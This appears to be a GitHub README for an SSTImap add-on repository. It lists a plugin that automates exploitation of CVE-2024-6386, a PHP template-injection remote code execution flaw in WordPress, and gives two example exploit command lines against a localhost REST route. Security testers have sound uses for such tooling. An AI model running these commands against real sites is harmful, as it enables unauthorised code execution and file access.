Home

Awesome

SSTImap Extra Plugins

SSTImap 1.2 Payload count Python 3.13 Python 3.6 GitHub GitHub last commit Maintenance

This repository contains SSTImap plugins, which might be useful in some specific cases, but are too situational to include in the main repository.

Installation:

Alternatively, required plugins can be manually saved in plugins/custom/ directory of SSTImap.

List of supported plugins

PluginVer.RCEBlindCode evaluationFile readFile write
CVE_2024_63861.2.3PHP

Plugin details

Plugin automates detection and exploitation of CVE-2024-6386 providing post-exploitation capabilities. Correctly set headers X-WP-Nonce and Content-Type as well as cookies are required for exploitation. Example:

./sstimap.py -i -e CVE_2024_6386 --data-type json -m POST -H "Content-Type: application/json" -H "X-WP-Nonce: ..." -H "Cookie: ..." -d '{"id":...,"content":"*"}' -u "http://localhost/index.php?rest_route=%2Fwp%2Fv2%2Fpages%2F..."

Developing plugins

New plugins are always welcome in PRs

Debugging tips

Example

./sstimap.py -i -e CVE_2024_6386 -p http://127.0.0.1:8080 --data-type json -m POST -H "Content-Type: application/json" -H "X-WP-Nonce: ..." -H "Cookie: ..." -d '{"id":...,"content":"*"}' -u "http://localhost/index.php?rest_route=%2Fwp%2Fv2%2Fpages%2F..."